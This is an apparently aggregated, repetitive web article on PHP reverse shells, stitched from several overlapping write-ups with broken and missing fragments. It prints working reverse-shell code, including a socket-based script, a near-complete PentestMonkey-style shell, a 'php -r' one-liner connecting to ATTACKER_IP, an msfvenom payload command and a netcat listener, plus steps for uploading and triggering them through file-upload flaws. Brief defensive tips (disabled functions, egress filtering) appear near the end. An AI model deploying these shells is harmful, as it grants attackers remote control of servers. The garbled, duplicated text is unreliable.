A PHP reverse shell is a common technique used by security professionals to gain remote command-line access to a server after exploiting a vulnerability. By having the target server initiate an outgoing connection to an attacker-controlled listener, it often bypasses inbound firewall restrictions. Top PHP Reverse Shell Methods
The following are the most widely recognized scripts and one-liners for establishing a PHP reverse shell:
Understanding Reverse Shells in PHP
A reverse shell is a type of shell that allows an attacker to access a victim's computer or server from a remote location. Unlike a traditional shell where the victim connects to the attacker, in a reverse shell, the victim initiates the connection to the attacker. This technique is commonly used in penetration testing and by attackers to bypass network security measures.
Why Use Reverse Shells in PHP?
PHP, being one of the most widely used server-side scripting languages, is often targeted by attackers. A reverse shell in PHP can be particularly useful for attackers to gain access to a server when direct shell access is restricted. For security professionals, understanding how reverse shells work can help in developing better defense mechanisms.
Basic Concept
The basic concept of a reverse shell involves:
PHP Reverse Shell Example
Below is a basic example of a PHP reverse shell. Note: This should only be used for educational purposes or in a controlled environment with permission.
<?php
$ip = 'your_ip_address'; // IP address of the attacker
$port = 1234; // Listening port
// Create a socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false)
$error = socket_last_error();
echo "socket_create() failed: $error\n";
else
// Connect to the attacker's listener
$result = socket_connect($sock, $ip, $port);
if ($result === false)
$error = socket_last_error($sock);
echo "socket_connect() failed: $error\n";
socket_close($sock);
else
// Make the shell
$descriptorspec = array(
0 => array("pipe", "r"), // stdin
1 => array("pipe", "w"), // stdout
2 => array("pipe", "w") // stderr
);
$process = proc_open("bash -i", $descriptorspec, $pipes);
if (is_resource($process))
while (true)
$input = socket_read($sock, 1024);
if ($input)
fwrite($pipes[0], $input);
$output = fread($pipes[1], 1024);
socket_write($sock, $output);
$output = fread($pipes[2], 1024);
socket_write($sock, $output);
proc_close($process);
socket_close($sock);
?>
Security Implications
This piece provides a high-level overview of reverse shells in PHP. For detailed technical knowledge, engaging with cybersecurity communities and professional training is recommended.
Introduction reverse shell is a type of shell session where the target machine initiates a connection back to the attacking machine. Unlike a traditional bind shell, where an attacker connects to a listening port on the server, a reverse shell "reverses" the roles to bypass Network Address Translation (IP masquerading)
that typically block incoming connections but allow outgoing traffic. In the context of PHP, these scripts are common tools used by penetration testers to gain interactive access to a web server after discovering a file upload vulnerability or a remote code execution (RCE) flaw. How PHP Reverse Shells Work
The core logic of a PHP reverse shell involves three main steps: Socket Creation:
The script creates a network socket pointing to the attacker’s IP address and a specific port (e.g., 4444). Process Execution: The script spawns a shell process (like on Linux or on Windows) using PHP functions like shell_exec() proc_open() I/O Redirection:
The script pipes the input from the network socket into the shell’s standard input (STDIN) and sends the shell’s output (STDOUT/STDERR) back through the socket to the attacker. Popular Techniques and "Top" Implementations reverse shell php top
Several "top" or industry-standard scripts are frequently used in security auditing: The PentestMonkey Script: This is perhaps the most famous PHP reverse shell. It uses
to create a robust bidirectional stream. It is highly reliable on Linux systems because it handles file descriptors manually to ensure the connection remains stable. The One-Liner:
For quick exploitation where space is limited, attackers use condensed commands. A common example uses to call a system-level tool like
, effectively using PHP as a bridge to execute a native reverse shell command. The Ivan Suchkov Script:
A more modern, streamlined version of the classic reverse shell that focuses on simplicity and compatibility with various PHP versions. Security Implications and Defense
The existence of these scripts highlights a critical security risk: if a web application allows an unauthorized user to execute PHP code, the entire server is compromised. To defend against these attacks, administrators should: Disable Dangerous Functions: disable_functions directive in to block functions like shell_exec Egress Filtering:
Configure firewalls to block all outgoing connections from the web server except to known, necessary services (like a database or an update server). Input Validation:
Ensure that file upload forms and URL parameters are strictly validated to prevent the initial injection of the malicious script. Conclusion
While "reverse shell php" is a term often associated with malicious activity, understanding how these scripts function is vital for cybersecurity professionals
. By mastering the mechanics of how PHP interacts with the underlying operating system, developers and sysadmins can build more resilient environments and better detect the early signs of a breach. specific PHP functions most commonly used to initiate these connections?
In the world of cybersecurity, a PHP Reverse Shell is a classic "connect-back" technique used by penetration testers (and unfortunately, bad actors) to gain remote command-line access to a web server. Unlike a standard connection where you "call" the server, a reverse shell forces the server to "call" you. The "Anatomy" of the Attack The story usually begins with an unrestricted file upload vulnerability The Entry Point
: An attacker finds a spot on a website—like a profile picture uploader or a resume submission form—that doesn't properly check what kind of file is being uploaded. The Payload
: Instead of a JPG or a PDF, the attacker uploads a script like the famous PentestMonkey PHP Reverse Shell Ivan Sincek’s version The Listener
: On their own machine, the attacker starts a "listener" (usually via a tool like Netcat) to wait for an incoming connection. The Execution
: The attacker navigates to the URL where their file was uploaded (e.g., ://website.com
). The server executes the PHP code, which opens a socket and sends a command prompt back to the attacker’s machine. Popular PHP Reverse Shell "Top" Picks A PHP reverse shell is a common technique
If you are looking for the most reliable scripts used in the industry for educational and ethical testing: PentestMonkey’s PHP Reverse Shell
: Often considered the "gold standard," this script is included in the default Kali Linux web shells directory ( /usr/share/webshells/php/ Ivan Sincek’s PHP Reverse Shell
: A modern, high-quality version that supports newer PHP versions (5.0+) and works across Linux, macOS, and even Windows. The One-Liner
: For quick execution when you have a tiny command injection window, this tiny snippet is a go-to:
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' Real-World Story: The Student Hacker
In a notable recent case from late 2025, security researchers identified a trend of "webshell underground" markets. One specific hacker, a student in Bangladesh, was reportedly using PHP backdoors to compromise WordPress and cPanel instances, selling access to these sites to pay for his education.
Bypassed! and uploaded a sweet reverse shell | by Ajay Sharma
A PHP reverse shell is a script that, when executed on a target server, initiates a TCP connection back to an attacker's machine, providing a remote command-line interface. Top PHP Reverse Shell Tools & Methods
Pentestmonkey's PHP Reverse Shell: This is the industry-standard script used for Linux-based targets. It is highly reliable and handles daemonization to ensure the connection persists even if the initial web request times out.
Ivan Sincek's PHP Reverse Shell: A modern, feature-rich version that supports both Linux and Windows. It includes web shell variants for situations where a full reverse shell is blocked by firewalls.
PHP One-Liners: Ideal for quick exploitation through command injection vulnerabilities.
Example: php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'.
Msfvenom Payloads: Part of the Metasploit Framework, msfvenom can generate obfuscated PHP payloads that are harder for antivirus to detect.
Command: msfvenom -p php/reverse_php LHOST=ATTACKER_IP LPORT=PORT > shell.php. Standard Implementation Procedure
Preparation: Edit the chosen script (like Pentestmonkey's) to include your listening IP address and port.
Listener Setup: Start a listener on your machine to "catch" the connection using a tool like Netcat. Command: nc -lvnp The attacker sets up a listener on a
Deployment: Upload the .php file to the target server, typically via a file upload vulnerability or a Remote Code Execution (RCE) flaw.
Execution: Access the uploaded file via a web browser (e.g., http://target.com). This triggers the script to connect back to your listener, granting you a shell. Detection and Prevention
Ingress Filtering: Implement strict file upload controls, such as whitelisting only safe extensions (e.g., .jpg, .png) and scanning uploaded files for malicious signatures.
Egress Filtering: Configure firewalls to block unauthorized outbound connections from web servers to the internet.
Disable Risky Functions: In the php.ini file, use the disable_functions directive to block functions often used by shells, such as exec(), shell_exec(), system(), and passthru().
Monitoring: Use security tools like Wiz or Invicti to detect unusual process spawning (e.g., www-data starting /bin/sh). Reverse Shell - Invicti
This is the gold standard. It is stable, feature-rich, and handles edge cases like pfsockopen (persistent sockets) and TTY shell upgrades.
Features:
fsockopen, pfsockopen, or socket_create.The Payload:
<?php // Uses fsockopen for a reliable reverse shell set_time_limit(0); $ip = 'YOUR_IP'; // CHANGE THIS $port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0;if (function_exists('pcntl_fork')) $pid = pcntl_fork(); if ($pid == -1) printit("ERROR: Can't fork"); exit(1); if ($pid) exit(0); if (posix_setsid() == -1) printit("Error: Can't setsid()"); exit(1); pcntl_fork(); else printit("Warning: pcntl_fork() not supported");
$sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) printit("$errstr ($errno)"); exit(1);
$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) printit("Error: proc_open failed"); exit(1);
stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0);
while (1) if (feof($sock)) printit("ERROR: Shell connection terminated"); break; if (feof($pipes[1])) printit("ERROR: Shell process terminated"); break; $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); if (in_array($pipes[1], $read_a)) $output = fread($pipes[1], $chunk_size); fwrite($sock, $output); if (in_array($pipes[2], $read_a)) $error_output = fread($pipes[2], $chunk_size); fwrite($sock, $error_output); proc_close($process); ?>
Rating: 10/10 – Use this for professional engagements.
.php, .phtml, .php5, .inc).Content-Disposition: attachment).